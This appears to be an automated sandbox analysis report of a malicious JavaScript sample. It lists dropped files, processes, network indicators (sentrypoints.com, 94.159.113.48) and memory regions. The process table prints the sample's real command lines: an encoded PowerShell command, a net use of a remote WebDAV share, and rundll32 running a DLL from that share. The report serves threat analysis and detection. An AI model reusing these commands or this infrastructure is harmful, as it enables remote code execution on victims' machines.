Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1997614539972622565.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3itwmj5m.fpk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teaw0blp.05e.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://sentrypoints.com:8888/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
http://sentrypoints.com:8888/pL
|
unknown
|
||
|
http://sentrypoints.com:8888/paceUl
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sentrypoints.com
|
94.159.113.48
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
sentrypoints.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7E0B3FB000
|
stack
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
|
7E0B67F000
|
stack
|
page read and write
|
||
|
27F605CC000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
27F62427000
|
heap
|
page read and write
|
||
|
19846B30000
|
heap
|
page read and write
|
||
|
19858AF3000
|
trusted library allocation
|
page read and write
|
||
|
19848FBE000
|
trusted library allocation
|
page read and write
|
||
|
27F62422000
|
heap
|
page read and write
|
||
|
198485B0000
|
heap
|
page read and write
|
||
|
19846C40000
|
heap
|
page read and write
|
||
|
1AD86CE3000
|
heap
|
page read and write
|
||
|
27F6245A000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
19846B3C000
|
heap
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
19860B49000
|
heap
|
page read and write
|
||
|
19848D14000
|
trusted library allocation
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
27F60550000
|
heap
|
page read and write
|
||
|
27F62435000
|
heap
|
page read and write
|
||
|
27F6242F000
|
heap
|
page read and write
|
||
|
27F6243E000
|
heap
|
page read and write
|
||
|
27F6246F000
|
heap
|
page read and write
|
||
|
37AD37B000
|
stack
|
page read and write
|
||
|
7FFD9B77A000
|
trusted library allocation
|
page read and write
|
||
|
37ACC7F000
|
stack
|
page read and write
|
||
|
19848560000
|
heap
|
page read and write
|
||
|
19860C40000
|
heap
|
page read and write
|
||
|
8A8ECFB000
|
stack
|
page read and write
|
||
|
19846B3E000
|
heap
|
page read and write
|
||
|
19846BE8000
|
heap
|
page read and write
|
||
|
7FFD9B6E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
37AD1FE000
|
stack
|
page read and write
|
||
|
37AD17F000
|
stack
|
page read and write
|
||
|
19846A00000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
222C69C0000
|
remote allocation
|
page read and write
|
||
|
27F6246E000
|
heap
|
page read and write
|
||
|
1AD86CF0000
|
heap
|
page read and write
|
||
|
19846B50000
|
heap
|
page read and write
|
||
|
27F6244E000
|
heap
|
page read and write
|
||
|
27F6242A000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
1AD86CC7000
|
heap
|
page read and write
|
||
|
19860B5D000
|
heap
|
page read and write
|
||
|
27F6242E000
|
heap
|
page read and write
|
||
|
9EA9FBA000
|
stack
|
page read and write
|
||
|
222C67EF000
|
heap
|
page read and write
|
||
|
27F62456000
|
heap
|
page read and write
|
||
|
27F62581000
|
heap
|
page read and write
|
||
|
7FFD9B676000
|
trusted library allocation
|
page read and write
|
||
|
27F62465000
|
heap
|
page read and write
|
||
|
27F6242D000
|
heap
|
page read and write
|
||
|
27F6084C000
|
heap
|
page read and write
|
||
|
19860AC6000
|
heap
|
page read and write
|
||
|
198610B0000
|
heap
|
page read and write
|
||
|
27F60607000
|
heap
|
page read and write
|
||
|
222C67F7000
|
heap
|
page read and write
|
||
|
19848A81000
|
trusted library allocation
|
page read and write
|
||
|
37ACEFE000
|
stack
|
page read and write
|
||
|
222C681C000
|
heap
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
27F6242D000
|
heap
|
page read and write
|
||
|
37AC90F000
|
stack
|
page read and write
|
||
|
27F62464000
|
heap
|
page read and write
|
||
|
19846B79000
|
heap
|
page read and write
|
||
|
27F6084B000
|
heap
|
page read and write
|
||
|
27F62426000
|
heap
|
page read and write
|
||
|
7FFD9B7A2000
|
trusted library allocation
|
page read and write
|
||
|
222C6770000
|
heap
|
page read and write
|
||
|
222C6816000
|
heap
|
page read and write
|
||
|
8A8E6FF000
|
stack
|
page read and write
|
||
|
19860BA0000
|
heap
|
page execute and read and write
|
||
|
19848B93000
|
trusted library allocation
|
page read and write
|
||
|
8A8E3FE000
|
stack
|
page read and write
|
||
|
19846B77000
|
heap
|
page read and write
|
||
|
222C69C0000
|
remote allocation
|
page read and write
|
||
|
19846B7E000
|
heap
|
page read and write
|
||
|
27F605A8000
|
heap
|
page read and write
|
||
|
37AC883000
|
stack
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
222C6829000
|
heap
|
page read and write
|
||
|
27F62473000
|
heap
|
page read and write
|
||
|
1AD86CB0000
|
heap
|
page read and write
|
||
|
27F6243A000
|
heap
|
page read and write
|
||
|
222C67F9000
|
heap
|
page read and write
|
||
|
222C683B000
|
heap
|
page read and write
|
||
|
27F62437000
|
heap
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
19860A80000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
27F605D7000
|
heap
|
page read and write
|
||
|
27F6242D000
|
heap
|
page read and write
|
||
|
7FFD9B771000
|
trusted library allocation
|
page read and write
|
||
|
27F62F32000
|
heap
|
page read and write
|
||
|
27F62469000
|
heap
|
page read and write
|
||
|
1AD88740000
|
heap
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
1AD8A460000
|
trusted library allocation
|
page read and write
|
||
|
19846BF0000
|
heap
|
page read and write
|
||
|
19848BDD000
|
trusted library allocation
|
page read and write
|
||
|
27F605D7000
|
heap
|
page read and write
|
||
|
27F6242D000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
37AC9CE000
|
stack
|
page read and write
|
||
|
27F605D7000
|
heap
|
page read and write
|
||
|
27F62464000
|
heap
|
page read and write
|
||
|
1AD86BB0000
|
heap
|
page read and write
|
||
|
37ACDFE000
|
stack
|
page read and write
|
||
|
37ACFF7000
|
stack
|
page read and write
|
||
|
1AD86CCF000
|
heap
|
page read and write
|
||
|
27F62C86000
|
heap
|
page read and write
|
||
|
7FFD9B5C4000
|
trusted library allocation
|
page read and write
|
||
|
222C69C0000
|
remote allocation
|
page read and write
|
||
|
27F6246D000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
19848FB8000
|
trusted library allocation
|
page read and write
|
||
|
7E0B7FC000
|
stack
|
page read and write
|
||
|
27F6057B000
|
heap
|
page read and write
|
||
|
19860D30000
|
heap
|
page read and write
|
||
|
19860D62000
|
heap
|
page read and write
|
||
|
198485BA000
|
heap
|
page read and write
|
||
|
19860B36000
|
heap
|
page read and write
|
||
|
222C6816000
|
heap
|
page read and write
|
||
|
19846B36000
|
heap
|
page read and write
|
||
|
19860B09000
|
heap
|
page read and write
|
||
|
8A8E8FE000
|
stack
|
page read and write
|
||
|
27F62433000
|
heap
|
page read and write
|
||
|
27F60720000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
19848F2C000
|
trusted library allocation
|
page read and write
|
||
|
27F60845000
|
heap
|
page read and write
|
||
|
1AD86CCF000
|
heap
|
page read and write
|
||
|
27F62421000
|
heap
|
page read and write
|
||
|
27F605C0000
|
heap
|
page read and write
|
||
|
1AD86DB0000
|
heap
|
page read and write
|
||
|
37AC98E000
|
stack
|
page read and write
|
||
|
27F605AB000
|
heap
|
page read and write
|
||
|
1AD86CD4000
|
heap
|
page read and write
|
||
|
19846CA0000
|
trusted library allocation
|
page read and write
|
||
|
27F6245B000
|
heap
|
page read and write
|
||
|
27F6244D000
|
heap
|
page read and write
|
||
|
19860BA7000
|
heap
|
page execute and read and write
|
||
|
27F6084E000
|
heap
|
page read and write
|
||
|
1AD86CDB000
|
heap
|
page read and write
|
||
|
37ACF78000
|
stack
|
page read and write
|
||
|
27F62424000
|
heap
|
page read and write
|
||
|
27F60530000
|
heap
|
page read and write
|
||
|
19860AC4000
|
heap
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F6058E000
|
heap
|
page read and write
|
||
|
1AD86F9B000
|
heap
|
page read and write
|
||
|
27F605D7000
|
heap
|
page read and write
|
||
|
37AD0F9000
|
stack
|
page read and write
|
||
|
19846CB0000
|
heap
|
page readonly
|
||
|
19846CC0000
|
trusted library allocation
|
page read and write
|
||
|
37ACE7E000
|
stack
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F605B6000
|
heap
|
page read and write
|
||
|
8A8E7FE000
|
stack
|
page read and write
|
||
|
1AD86CCB000
|
heap
|
page read and write
|
||
|
27F6246F000
|
heap
|
page read and write
|
||
|
222C67EF000
|
heap
|
page read and write
|
||
|
222C6780000
|
heap
|
page read and write
|
||
|
19846AF8000
|
heap
|
page read and write
|
||
|
19848AE9000
|
trusted library allocation
|
page read and write
|
||
|
8A8EAFD000
|
stack
|
page read and write
|
||
|
19860D20000
|
heap
|
page read and write
|
||
|
27F62842000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
222C682F000
|
heap
|
page read and write
|
||
|
19848B90000
|
trusted library allocation
|
page read and write
|
||
|
27F605BD000
|
heap
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F6245C000
|
heap
|
page read and write
|
||
|
7FFD9B5C2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
27F605D7000
|
heap
|
page read and write
|
||
|
1AD89ED0000
|
heap
|
page read and write
|
||
|
27F6084C000
|
heap
|
page read and write
|
||
|
37AD2FE000
|
stack
|
page read and write
|
||
|
222C682F000
|
heap
|
page read and write
|
||
|
8A8E2F4000
|
stack
|
page read and write
|
||
|
19858A90000
|
trusted library allocation
|
page read and write
|
||
|
222C67FE000
|
heap
|
page read and write
|
||
|
27F6058F000
|
heap
|
page read and write
|
||
|
27F62420000
|
heap
|
page read and write
|
||
|
222C6835000
|
heap
|
page read and write
|
||
|
222C683B000
|
heap
|
page read and write
|
||
|
19860D71000
|
heap
|
page read and write
|
||
|
27F605CD000
|
heap
|
page read and write
|
||
|
9EAA2FE000
|
stack
|
page read and write
|
||
|
19846C80000
|
trusted library allocation
|
page read and write
|
||
|
19848BD7000
|
trusted library allocation
|
page read and write
|
||
|
19848A20000
|
heap
|
page execute and read and write
|
||
|
27F62B0B000
|
heap
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
27F6057A000
|
heap
|
page read and write
|
||
|
27F62435000
|
heap
|
page read and write
|
||
|
9EAA27E000
|
stack
|
page read and write
|
||
|
37ACD7D000
|
stack
|
page read and write
|
||
|
27F60580000
|
heap
|
page read and write
|
||
|
27F6084A000
|
heap
|
page read and write
|
||
|
19846B02000
|
heap
|
page read and write
|
||
|
27F60520000
|
heap
|
page read and write
|
||
|
19860AB1000
|
heap
|
page read and write
|
||
|
222C6835000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1AD86CDE000
|
heap
|
page read and write
|
||
|
222C67F7000
|
heap
|
page read and write
|
||
|
7FFD9B6A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
198485B5000
|
heap
|
page read and write
|
||
|
27F607D0000
|
heap
|
page read and write
|
||
|
7E0B6FE000
|
stack
|
page read and write
|
||
|
7E0B77B000
|
stack
|
page read and write
|
||
|
19848E26000
|
trusted library allocation
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
27F605B2000
|
heap
|
page read and write
|
||
|
27F6284C000
|
heap
|
page read and write
|
||
|
7FFD9B5C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
222C67C8000
|
heap
|
page read and write
|
||
|
1AD89ED3000
|
heap
|
page read and write
|
||
|
1AD86CCB000
|
heap
|
page read and write
|
||
|
1AD86CF8000
|
heap
|
page read and write
|
||
|
1AD86CD0000
|
heap
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
7FFD9B670000
|
trusted library allocation
|
page read and write
|
||
|
27F6246B000
|
heap
|
page read and write
|
||
|
1AD86CBE000
|
heap
|
page read and write
|
||
|
222C67C0000
|
heap
|
page read and write
|
||
|
27F62451000
|
heap
|
page read and write
|
||
|
27F62464000
|
heap
|
page read and write
|
||
|
19846CE5000
|
heap
|
page read and write
|
||
|
27F605BA000
|
heap
|
page read and write
|
||
|
27F62466000
|
heap
|
page read and write
|
||
|
19846AF0000
|
heap
|
page read and write
|
||
|
19846C10000
|
heap
|
page read and write
|
||
|
7DF48E460000
|
trusted library allocation
|
page execute and read and write
|
||
|
37ACCFE000
|
stack
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
27F60840000
|
heap
|
page read and write
|
||
|
27F629BB000
|
heap
|
page read and write
|
||
|
27F62446000
|
heap
|
page read and write
|
||
|
222C67A0000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D0000
|
trusted library allocation
|
page read and write
|
||
|
19848B1B000
|
trusted library allocation
|
page read and write
|
||
|
1AD86F90000
|
heap
|
page read and write
|
||
|
1AD89EA0000
|
heap
|
page read and write
|
||
|
222C67FE000
|
heap
|
page read and write
|
||
|
1AD86C90000
|
heap
|
page read and write
|
||
|
19848A9B000
|
trusted library allocation
|
page read and write
|
||
|
37AD07B000
|
stack
|
page read and write
|
||
|
27F6084C000
|
heap
|
page read and write
|
||
|
19848A70000
|
heap
|
page execute and read and write
|
||
|
222C6A70000
|
heap
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
27F62464000
|
heap
|
page read and write
|
||
|
1AD86CCF000
|
heap
|
page read and write
|
||
|
27F62421000
|
heap
|
page read and write
|
||
|
27F6084A000
|
heap
|
page read and write
|
||
|
37ACFFE000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F605C1000
|
heap
|
page read and write
|
||
|
27F62432000
|
heap
|
page read and write
|
||
|
37AD27E000
|
stack
|
page read and write
|
||
|
19848B8D000
|
trusted library allocation
|
page read and write
|
||
|
222C6829000
|
heap
|
page read and write
|
||
|
19858A81000
|
trusted library allocation
|
page read and write
|
||
|
19846B32000
|
heap
|
page read and write
|
||
|
1AD86F95000
|
heap
|
page read and write
|
||
|
27F6243D000
|
heap
|
page read and write
|
||
|
19846BDC000
|
heap
|
page read and write
|
||
|
19846CE0000
|
heap
|
page read and write
|
||
|
27F62445000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
27F6242B000
|
heap
|
page read and write
|
||
|
222C6A75000
|
heap
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
19860B19000
|
heap
|
page read and write
|
||
|
7E0B87F000
|
stack
|
page read and write
|
||
|
8A8E4FE000
|
stack
|
page read and write
|
||
|
19848F88000
|
trusted library allocation
|
page read and write
|
||
|
222C681F000
|
heap
|
page read and write
|
||
|
27F62448000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A8E9FE000
|
stack
|
page read and write
|
||
|
27F62438000
|
heap
|
page read and write
|
||
|
27F62436000
|
heap
|
page read and write
|
||
|
27F6057F000
|
heap
|
page read and write
|
||
|
19848E1A000
|
trusted library allocation
|
page read and write
|
||
|
27F62459000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B67C000
|
trusted library allocation
|
page execute and read and write
|
There are 291 hidden memdumps, click here to show them.